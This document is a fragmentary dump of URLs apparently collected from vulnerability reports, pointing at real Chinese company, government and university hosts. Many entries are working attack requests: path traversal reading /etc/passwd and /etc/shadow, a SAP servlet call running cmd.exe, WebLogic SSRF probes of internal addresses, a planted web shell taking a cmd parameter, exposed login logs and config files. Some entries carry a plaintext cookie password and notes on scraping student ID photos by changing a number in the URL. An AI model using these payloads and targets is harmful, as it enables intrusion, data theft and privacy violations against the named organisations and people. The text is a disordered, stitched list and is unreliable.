http://**.**.**.**:88/tools/SWFUpload/upload.jsp height:20px;BORDER http://consumer.huawei.com/support/services/service/tcsReservation/findReservationByReservationNo?jsonp=jQuery191020111111365258694_1448884905233&reservationNo=YY15113000377&mobile=13333333333&siteCode=cn&_=1448884905248 http://consumer.huawei.com/support/services/service/tcsReservation/reservation/time?jsonp=jQuery191020111111365258694_1448884905233&networkCode=CNA1083S05&reservationDate=2015-12-01&_=1448884905245 http://**.**.**.**/public/index.php?main=1 http://**.**.**.**/oicindex/content.php?type=1 http://**.**.**.**/public/view.php?main=3&sub=27&ssub=30&id=1906 http://**.**.**.**/public/searchdata.php?lang=tw&textfield2=88952634&search=88952634&select2=1 http://**.**.**.**/public/view.php?main=3&sub=27&ssub=30&id=1906 http://**.**.**.**/intro.php?id=1 http://**.**.**.**/news.asp?cat=82&year_date=2003 http://www.dk-fx.com/zh-cn/read.jsp?id=13~如图所示: http://**.**.**.**:80/ F956C96A974341E1ADEE6111EF968CDF:FG=1 http://**.**.**.**/index.php?currency=HKD&cPath=45 http://**.**.**.**/index.php?currency=HKD&cPath=45 welomo.com/index.php/Index/brand_details?sl_id=27 http://106.37.237.220/seeyon//logs/login.log http://106.37.237.220/seeyon/ http://info.swcaac.gov.cn/wxdw/webui/wfmRwgl_Sqs_Show.aspx?gwId=1&IfSpm=1 http://xbgjxt.swu.cn/ http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=138061&jobid=28139&code=64f0a9a558419c629275fb3410abcaef http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=54059&jobid=28139&code=daf8545d125eeadc2c983cb6eb880739 http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=141244&jobid=28139&code=12b6d7d2467c8267e6cad9e7099812fc http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=142450&jobid=28139&code=eb4954f8cad6c4093efd5cb2c7148d42 http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=66210&jobid=28139&code=c7654c7501a87e54ba42dd1d1f38f1a6 http://**.**.**.**:8080/tools/SWFUpload/upload.jsp height:20px;BORDER http://os.wasu.cn/weixiu/delwxd.php?id=1 http://os.wasu.cn/weixiu/pdxz.php?id=1 http://os.wasu.cn/weixiu/savewxd.php http://os.wasu.cn/weixiu/weixiu.php?id=1 http://os.wasu.cn/weixiu/wxxz.php?id=1 http://newoa.xbwl.cn http://**.**.**.**/null上传的文件名.jsp http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/etc/passwd http://brs.cninsure.net/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=3 http://61.160.82.219:7002 http://61.160.82.219:7002/uddiexplorer/ma3.jsp http://act.midea.com/jdprize/site/CI4/v2.php http://**.**.**.**/ https://my.1hai.cn/Login https://my.1hai.cn/Login http://**.**.**.**/cgi/newslist.php?dir=101&page=1 http://211.147.244.215/seeyon//logs/login.log http://211.147.244.215/seeyon/ http://**.**.**.**:9080/console/ jdbc:microsoft:sqlserver**.**.**.**:2433"/ jdbc:microsoft:sqlserver**.**.**.**:1433;DatabaseName=SmsClub jdbc:microsoft:sqlserver**.**.**.**:1433;databasename=smdbc http://bidding.sinopec.com http://chat1.gome.com.cn/live800/downlog.jsp?path=/&fileName=/etc/passwd http://www.hwht.com/jobs.html?act=detail&id=24 http://www.invescogreatwall.com:9080/live800/downlog.jsp?path=/&fileName=/C:\Windows\system.ini http://**.**.**.**:80/cms/wcm/login.jsp http://cconline.southernfund.com:8080/live800/downlog.jsp?path=/&fileName=/etc/passwd http://oa.hunantv.com/ http://**.**.**.**/Home/Login http://**.**.**.**/newscolumnistcontent.action?articleId=4294844&authorCode=COL_QWM jar:/usr/lib/jvm/java/lib/tools.jar http://360.m.ayibang.com/enterprise/success/?id=155 http://mtest.ayibang.com/enterprise/success/?id=151 http://**.**.**.**/en/culture/news_content.asp?id=88&listPage=1 http://**.**.**.**/en/culture/news_content.asp?id=88&listPage=1 http://lib.cufe.edu.cn http://**.**.**.**/login.aspx?ReturnUrl=%2f http://**.**.**.**/0529/query.php?iy=1905&p=1 http://www.xuexiba.com/ResetPass/EditPassword?userInfoID=67789 http://**.**.**.**/userlogin.aspx?mid=11&url=/magzartlist.aspx?mcid=3 http://live.huatu.com/Zbym/index/id/1188*/fx/tj http://**.**.**.**/member/index.jspx http://gsl.sdu.edu.cn/ http://redmine.yicai.com/ http://**.**.**.**/ http://**.**.**.**/news/title/detail.php?Company_SN=1000011476&Site_News_SN=1000014022 http://**.**.**.**/news/title/detail.php?Company_SN=1000011476&Site_News_SN=1000014022 http://academic.law.tsinghua.edu.cn/homepage/index.php?r=search/index&keyword=XPGZ http://academic.law.tsinghua.edu.cn/homepage/index.php?r=search/index&keyword=XPGZ https://**.**.**.** http://**.**.**.**/ https://crm.itrus.com.cn http://**.**.**.**/new_detail.php?tj=8&ty=19&id=114 http://**.**.**.**/new_detail.php?tj=8&ty=19&id=114"-p index.php/gx_tuangou/open_ad?url= index.php/gx_tuangou/open_ad?url=**.**.**.** index.php/gx_tuangou/open_ad?url=**.**.**.** http://**.**.**.**/index.php?op=newsList&action=details&nid=1278&lang=schi http://**.**.**.**/index.php?op=newsList&action=details&nid=1278&lang=schi http://www.lagou.com/gongsi/78386.html http://site682174-8413-203.strikingly.com/ jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@localhost:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl http://**.**.**.** http://**.**.**.**:80/ F15F213033B16562C74353BB6B29AC4C:FG=1 http://espel.sem.tsinghua.edu.cn/public/participant_create.php?dr=Yes.&s=11 http://**.**.**.**/ http://**.**.**.**/download.php?id=3322 http://**.**.**.**/index.php?option=com_cckjseblod&task=download&file=configuration.php http://**.**.**.**/5VCommon.asmx?op=UploadFile http://**.**.**.**/5VCommon.asmx?op=uploadImage http://**.**.**.**/Common/UploadFilse/201512111558739RJ6A74/2.asp http://**.**.**.**/ http://**.**.**.**/bbn/visitTesting/download.htm?fileUrl=file:/// http://**.**.**.**/bbn/visitTesting/download.htm?fileUrl=http:// http://www.zsyj.zjut.edu.cn/zs_web/getareaandclass.action http://chat.ofcard.com/live800/downlog.jsp?path=/&fileName=/C:\Windows\system.ini http://oa.glsc.com.cn:8084/names.nsf?Login http://wap.huatu.com/httsxq/bid/55* http://wap.huatu.com/htzxxq/vid/1014466* http://wap.huatu.com/htzbxq/id/17308* http://wap.huatu.com/httsxq/bid/55* http://**.**.**.**:80/tmap/map_unicom_list.asp?province=31&type=1&name=1&companytype=11&page=1 http://180.153.223.219/article.php?id=150 http://wooyun.org/bugs/wooyun-2015-0116152 http://wooyun.org/bugs/wooyun-2015-0156894 http://123.127.137.170/seeyon/management/status.jsp http://123.127.137.170/seeyon/logs/login.log http://58.62.185.148:88/seeyon/index.jsp http://wooyun.org/bugs/wooyun-2015-0116152 http://58.62.185.148:88/seeyon/management/status.jsp http://58.62.185.148:88/seeyon/logs/login.log http://211.147.212.212:8089/ http://mail.huatu.com/有验证码, https://211.147.212.215;企业邮箱登录地址:mail.huatu.com; https://is.huatu.com http://182.151.206.253/mysql/ http://www.zteup.com/view/toindex http://std.zteup.com:8080/ http://**.**.**.**/gb/news_view.php?nid=86 http://**.**.**.**/gb/news_view.php?nid=86 http://**.**.**.**/pages/activity/community/index.jsp Cookie:userCookie=uname=xucuipin&pwd=xcp2014 https://**.**.**.**:8080/10000admin/home/index http://219.143.252.189:8088/seeyon/index.jsp http://219.143.252.189:8088/seeyon/management/status.jsp http://219.143.252.189:8088/seeyon/logs/login.log http://cps.huatu.com/index.php http://**.**.**.**/ui/common/cvar/CExec.jsp http://bioinfo.au.tsinghua.edu.cn/dbsuper/details.php?cell=C_001&g=hg19&pm=24119843&se_id=SE_00217 http://xinjiangcme.91huayi.com/report/publicedList.aspx?displayMode=1&EndDate=01/01/1967&frontForUnit=1&holdYear=2015&lowUnitCode=01&principalName=kckpcpey&projectCode=111&projectKind=%C8%AB%B2%BF&ProjectLevel=&projectName=qmsesdux&publicBatch=-1&StartDate=01/01/1967&subject2=01&subject3=0101 http://wireless.xiaozhu.com/app/xzfk/android/220/my/modifyFavorite?_=1448946684365&sessId=f83651f6f45cb6e94578c69a051f8185&dispathChannel=xiaozhu&userId=1823761635&luId=1746300834 http://**.**.**.**/tagInfo/manage/query http://oa.cofco-keystone.com http://oa.cofco-keystone.com/webdoc/file_show.aspx?id=1 http://oa.cofco-keystone.com/webdoc/HtmlSignatureServer.aspx?DocumentID=1&SignatureID=1&Signature=1&COMMAND=SHOWSIGNATURE http://oa.cofco-keystone.com/Common/GetImageFileFromDB.aspx?empGuid=c3c8d9e2-70cf-4375-8307-c080b18ff5da http://oa.xinladao.net/seeyon/management/ http://jysx.njau.edu.cn/ http://jysx.njau.edu.cn http://wx.minanins.com:9090/ca/ma1.jsp http://**.**.**.**/product.php?product_id=169 http://**.**.**.**/product.php?product_id=169 http://hz.cofcopack.com/login.do http://**.**.**.**/passwd_check.php http://**.**.**.**/passwd_check.php http://**.**.**.**/home/news.php?id=107&class=1 http://event.ztgame.com http://**.**.**.**/dr_detail.php?id=7241 http://**.**.**.**/后,根据链接“**.**.**.**/attachmentDownload.portal?notUseCache=true&type=userPhoto&ownerId=”后面加上学生学号就可以获取该学生的证件照,例如登录后输入链接“**.**.**.**/attachmentDownload.portal?notUseCache=true&type=userPhoto&ownerId=2015282110183”即可获取学号为2015282110183的学生证件照,直接修改该链接后面的学号,就可以获取对应学生的证件照。我写了一个简单的脚本,就爬去了相当数量的证件照。 http://800.vip.com/live800/downloadserver?fid=/&act=2&isAbleZip=0&fna=../../../etc/passwd&a=1 http://oim.oppo.com/oim/downloadserver?fid=/&act=2&isAbleZip=0&fna=../../../../../etc/passwd&a=1 http://www.dongfeng-honda.com/crv_mediaReport.php?nid=440 http://**.**.**.**/Report/DetailResultM.aspx?tableID=76 http://www.dxzq.net/ http://oa.dxzq.net/c6/Jhsoft.Web.login/PassWordSlide.aspx http://oa.dxzq.net/C6/Jhsoft.mobileapp/login/login.html https://**.**.**.**/nimeia/newEdi/blob/ec89e088868753031a34502d4bd7a03548020bd4/channel-base/src/main/java/cn/com/sinosoft/edi/channel/base/communication/http/DaZhongTransmissionServiceImpl.java http://**.**.**.** http://**.**.**.**/news_detail.php?id=14 http://**.**.**.**/news_detail.php?id=14 http://dmoo.cofco.com/dmoo/jsp/main.jsp http://219.143.252.76/cn/web/user_login.aspx http://119.90.48.215:8080/index.html http://119.90.48.201:8080/index.html https://**.**.**.**/ePolicy https://**.**.**.**/nimeia/newEdi/blob/ec89e088868753031a34502d4bd7a03548020bd4/channel-base/src/main/java/cn/com/sinosoft/edi/channel/base/communication/http/AnLianHttpTransmissionServiceImpl.java http://**.**.**.**/it-school/php/webcms/public/index.php3?refid=1104&mode=published&lang=en&nocache1402373480 http://**.**.**.**/it-school/php/webcms/public/index.php3?refid=1104&mode=published&lang=en&nocache1402373480 http://**.**.**.**/common.asp?id=1 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/2015lq/index.asp http://**.**.**.**:83/hzjw/business/xzjglist http://211.151.142.213/gamepay/game_pay_main/index?g_id=314&sidebar_id=2&tid=8001&server_type=106649 http://211.151.142.213/gamepay/game_pay_main/check_game_user?g_id=615&user_name=11111111&server_id=257027&t=0%2E5307019442298461 http://lqsp.dflzm.com.cn:8081/CVWL/system/loginAction!logOut.action http://**.**.**.**/webmessage/view_info.jsp?info_id=35 http://mailserver.snei.com.cn/ http://l.mop.com/ http://gc.imop.com/passport/login.php http://**.**.**.**/article/cowmanwork/article/article.php?item_id=253 http://**.**.**.**/article/cowmanwork/article/article.php?item_id=253 http://ctm.sysu.edu.cn/EN/article/searchArticleResult.do?pager=1 http://**.**.**.**/ActionAllResult.aspx?MagazineId=105 http://**.**.**.**/ActionAllResult.aspx?MagazineId=105 http://dec.jlu.edu.cn http://**.**.**.**/topic_view.php?topicid=246 http://**.**.**.**/topic_view.php?topicid=246 http://**.**.**.**/cs/download.php?sub=driverdetail&PItemID=105 http://**.**.**.**/cs/download.php?sub=driverdetail&PItemID=105 http://ahts.huatu.com http://10.12.16.126:801/eportal/Bootstrap/WebRoot/RucSetting.php http://506srm.cofco.com/ftb.imagegallery.aspx http://506srm.cofco.com/images/whynot.aspx http://**.**.**.**/newsContent.aspx?serial=6760 http://**.**.**.**/newsContent.aspx?serial=6760 http://jse.tju.edu.cn:80/ http://**.**.**.**/vpro.asp?id=97 http://**.**.**.**/vpro.asp?id=97 http://oa.xinladao.net/seeyon//logs/login.log http://oa.xinladao.net/seeyon/ https://**.**.**.**/ http://27.151.112.180:9000/seeyon//logs/login.log http://27.151.112.180:9000/seeyon/ http://wap.yingyuan.cn/seeyon//logs/login.log http://wap.yingyuan.cn/seeyon/ http://**.**.**.**/neirong_news.asp?id=17 http://mail.cofcorice.com/ http://**.**.**.**/seeyon//logs/ctp.log http://**.**.**.**/seeyon/ https://**.**.**.**主站redis服务未授权访问,可写文件 http://www.rqbao.com/ http://www.rqbao.com/member/login http://111.8.85.13:81/seeyon//logs/login.log http://111.8.85.13:81/seeyon/ inurl:/sfs3/modules/ http://218.93.115.141:8080/seeyon//logs/login.log http://218.93.115.141:8080/seeyon/ http://219.143.162.218/htwx/indexlis.jsp http://219.143.162.218/htwx/common/cvar/CExec.jsp http://**.**.**.**:9090/pms/project/task/projectTaskEditIndex.action?flag=designAudit&id=2349160401 http://**.**.**.**:9200/ http://**.**.**.**/pages/popup/select-user.aspx?t=ctl00_content_piUser_ctl00&v=ctl00_content_piUser_ctl01 http://**.**.**.**/pages/append-design-material/apply.aspx http://**.**.**.**/pages/source-equipment-model/source-equipment-pool-list.aspx http://**.**.**.**:8000/7Expand/TruTalkJumpAddr.aspx http://**.**.**.**:8000/7Expand/ImportPhoneNumber.aspx?CompanyInfo=%D0%C5%D4%C6%D4%C6%C6%BD%CC%A8,**.**.**.**:8800,28103 http://www.emptylegchina.com/ http://op.campus.163.com/adm/selectcate.do?flags=1,2 http://op.campus.163.com/adm/selectcate.do?flags=1,2 http://210.51.48.118 http://210.51.48.118:7001/lht/ http://210.51.48.118:7001/lht/ma3.jsp http://210.51.48.118:7001/lht/out.jsp http://**.**.**.**/bugs/wooyun-2010-0149968。我们来进行一一突破。 chrome://mini_download_frame提供种子文件的解析下载。 http://219.228.130.149/ http://219.228.130.149/Upload/Video_Source/zhangjin_201512011958362957773.Asp http://124.202.134.56/login http://124.202.134.56/uddiexplorer/css.jsp http://124.202.134.56/uddiexplorer/out.jsp http://www.meilishuo.com/share/item/3475786195?ad_tag=1_0_61_0_0-0-0&d_r=6__1-1-2-11 http://**.**.**.**/main.php?pid=30 https://27.115.34.20/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe%20/c%20ipconfig%20/all http://www.haodai.com/ajax/getpasswd http://wooyun.org/bugs/wooyun-2015-0157467/trace/af09389383ebca9dfd7e73822802417d http://home.sunyard.com/ http://122.224.86.103/common/jsp/file.jsp?key=file&form=formdata&field=attach_name_1&filetitle=attach_title_1& http://zone.wooyun.org/content/14470。 http://yiliao.kingdee.com/inform.php?action=add&companyname=e&intro=1&email=a@b.com&name=1&position=1&tel=1 http://x.x.x.x//MobileApp/login.aspx http://x.x.x.x http://sale.vmall.com/honorbonus.html http://www.vmall.com/sale/coupon/checkImei?callback=jsonp1448983333333&imei=123412341234123 http://euro2012.touzhu.cn/Desc/city*/ http://**.**.**.**:7788/szinfo/net360!execute.action?orgId=48821 code:6390被直接返回了 http://219.141.242.62/iucp http://act.vg.ztgame.com/video/public/show/13 http://service.zhaopin.com/live800/downlog.jsp?path=/&fileName=/etc/hosts http://www.cbsi.com.cn/index.php?m=poster&c=index&a=poster_click&id=1 http://**.**.**.**/news_list_wd/&newsCategoryId=7.html http://www.bankofshanghai.com/uddiexplorer/SearchPublicRegistries.jsp http://www.szse.cn/uddiexplorer/SetupUDDIExplorer.jsp http://www.szse.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.132.82.17:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.**/cnbtjc/hbcx/hbcx.shtml http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://app.**.**.**.** http://m.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.lvxingshe.me http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.edaojia.so http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.beiwo.ac http://beiwo.ac http://**.**.**.** http://**.**.**.** http://www.daimao.tv http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**.cn http://**.**.**.** http://**.**.**.** http://**.**.**.** http://ask.**.**.**.** http://**.**.**.** http://**.**.**.** http://test.**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** https://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://qq.**.**.**.** http://**.**.**.** http://jackon.me http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.uning.tv http://**.**.**.** http://api.uning.tv http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**1 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://m.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** https://ly.wanda.cn/ http://60.28.104.133:9060/yyoa/ http://www.cs.ecitic.com/uddiexplorer/SearchPublicRegistries http://www.nffund.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://www.dfzq.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.**/pc/index.aspx http://**.**.**.**/pc/productlist.aspx?productid=2 http://fnonline.feiniu.com/live800/downlog.jsp?filepath=/&file=etc/passwd http://**.**.**.**/ec/oldpolicy/oldpolicy_into.action http://219.143.162.218/htwx/ http://219.143.162.218/htwx/common/easyQueryVer3/EasyQueryXML.jsp http://219.143.162.218/htwx/ http://chat.beibei.com/live/downloadserver?fid=/&act=2&isAbleZip=0&fna=../../../etc/shadow&a=1 http://www.xsdzq.cn/ http://oa.xsdzq.cn/C6/Jhsoft.Web.login/PassWordSlide.aspx http://oa.xsdzq.cn/C6/Jhsoft.mobileapp/login/login.html www.chinaamc.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.1.139:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://www.zte-v.com.cn/manage/Default.aspx http://210.51.195.4/admin/index.asp http://210.51.195.4/admin/index.asp http://210.51.195.4/Templates/cn/html/1.asp;.html http://42.62.67.117/.git/config http://42.62.67.117/wp-admin/ http://wp.licaifan.com/wp-admin/ http://**.**.**.**/index.aspx http://**.**.**.**/pPackageTraceQuery.aspx https://github.com/nimeia/newEdi/blob/ec89e088868753031a34502d4bd7a03548020bd4/channel-base/src/main/java/cn/com/sinosoft/edi/channel/base/communication/http/MinAnHttpTransmissionServiceImpl.java inurl:ioffice查了一下用红帆iOffice办公平台的还有 http://**.**.**.**/ioffice/prg/set/wss/ioCtlSet.asmx http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=DSCN0292.jpg|@~@&SUB_DIR=&PIC_PATH=d:/myoa/%D4%B1%B9%A4%BB%EE%B6%AF http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=index.php|@~@&SUB_DIR=&PIC_PATH=d:/myoa/webroot http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=cmd.exe|@~@&SUB_DIR=&PIC_PATH=c:/windows/system32 http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1 http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1 http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1 http://sq.baomihua.com/special/sq/SqRegistrar/sqlogin.aspx这里,登录位置没有验证码限制 http://mooc1.chaoxing.com/moocAnalysis/statistics-tch?courseId=账户CourseID&classId=账户CLASSID&ut=t http://mooc1.chaoxing.com/moocAnalysis/statistics-tch?courseId=81805653&classId=407832&ut=t http://www.jointwisdom.cn/index.php?c=content&a=list&catid=34 http://www.jointwisdom.cn/jinxing/hotelInfo.php?hotel_id=166 http://**.**.**.**/bugs/wooyun-2010-093049 http://**.**.**.**/ebook.php?id=3 http://info.tcl.com http://m.peugeot.com.cn:80/campaign/user/user.php?action=register http://www.gpslh.com/loginlh.jsp http://app.caijing.com.cn/?app=member&controller=index&action=login这个地方没有验证码没有登录限制 www.gw.com.cn http://live.huatu.com/Msym/index/id/49*/p/2.html http://gsts.huatu.com http://idke.ruc.edu.cn http://42.62.2.82/WEB-INF/web.xml http://42.62.2.82/WEB-INF/proxool_sql.xml http://oa.autoradio.cn/ http://new.conqueror.cn/productsDia.php?classId=12&id=643&sClassId=14 http://**.**.**.**/c6/Jhsoft.Web.login/newview.aspx?id=1 http://**.**.**.**/web/newsshow.asp?CatalogID=139&id=699 http://**.**.**.**/shopsmart/index.php/Article/index/first_cate_id/10100*/module/0/art_id/639.html http://www.renrenle.cn/scm/jump.do?prefix=&page=/logoff.do?method=logoff http://www.renrenle.cn/scm/quote/newSupplyAction.do?method=view&supplyID=136732 http://222.33.134.193:8080/yyoa/ http://222.33.134.193:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://b.wlanplus.com/cpa/escoreAndroidCallBack?uuid=2d6191c4dd0c1d134b5a16f65b151e84&userID=36026170-6381561&score=20&exchangetime=2015-11-27+17%3A20%3A30&plat=0&appName=%E7%95%85%E6%97%A0%E7%BA%BF&idfa=&adId=14388&adName=%E4%B9%90%E8%9C%82%E7%BD%91&packageName=com.yek.lafaso&order_id=2d6191c4dd0c1d134b5a16f65b151e8414388&signNum=1&appChildId=&appChildName=&sign=43628332fa8d07f3326c9bea8551a1e1 http://**.**.**.**:9080/cypx_hn/ https://licai.lianjia.com/loanContract?bidId=11051,暴露服务器信息了 https://licai.lianjia.com/guaranteeContract?bidId=10001&nowTime=2ffujjrk,修改bidId为10000以上的数字,即可看到对应借款及担保协议信息 http://**.**.**.**/ http://www.renrenle.cn/scm/jump.do?prefix=&page=/logoff.do?method=logoff http://www.renrenle.cn/scm/quote/newSupplyAction.do?method=view&supplyID=136732 http://news.lenovomm.com/solr/#/ javax.servlet-api-3.1.0.jar/data/solr-5.2.1/server/lib/jetty-continuation-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-deploy-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-http-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-io-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-jmx-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-rewrite-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-security-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-server-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-servlet-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-servlets-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-util-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-webapp-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-xml-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/ext/jcl-over-slf4j-1.7.7.jar/data/solr-5.2.1/server/lib/ext/jul-to-slf4j-1.7.7.jar/data/solr-5.2.1/server/lib/ext/log4j-1.2.17.jar/data/solr-5.2.1/server/lib/ext/slf4j-api-1.7.7.jar/data/solr-5.2.1/server/lib/ext/slf4j-log4j12-1.7.7.jar/data/solr-5.2.1/server/resources http://ksec.koolearn.com/kyds2015/aps http://**.**.**.**/admin/utility/showImageId.php?id=103041 http://**.**.**.**/gceService.php?type=2%27 http://**.**.**.**/tmpbiuve.php?cmd=ipconfig http://t.10jqka.com.cn/ http://t.10jqka.com.cn/manage0033t/index/ http://www.cre.cn/jsp/fgsjj/detail_4_dd.jsp?id=914 http://www.njzxw.cn/Plugins/swfFileUpload/UploadHandler.ashx http://club.zoomla.cn/,但账户密码应该没有换把?查看bbs的账户有3W多条: http://**.**.**.** http://em.hit.edu.cn/yjsjj.asp?sp=-1 http://**.**.**.**/bugs/wooyun-2010-0120530续(注意,页面不同) http://**.**.**.**/indexlis.jsp时 http://**.**.**.**/common/easyQueryVer3/EasyQueryVer3.js status:no;help:0;close:0;dialogWidth:0px;dialogHeight:0px;resizable=1 http://**.**.**.**/bugs/wooyun-2015-0138683 http://wooyun.org/bugs/wooyun-2015-0147511为什么要忽略呢! online.kingdee.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://**.**.**.**/xwcj/manage.php?m=Scan&a=article_list http://bb.ztgame.com/backend/index/login http://**.**.**.** http://**.**.**.** http://tepos.jxlife.com.cn/ter/ http://tepos.jxlife.com.cn/ter/common/cvar/CExec.jsp http://210.52.218.144/phpmyadmin/index.php http://univ.zte.com.cn/DeanMainBox/WriteMailToDean.aspx?isportal=ok&userid=&username=&CurCulture=1 http://120.26.113.45/ http://www.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://www.gome.com.cn/uddiexplorer/SetupUDDIExplorer.jsp http://www.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:8080&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search 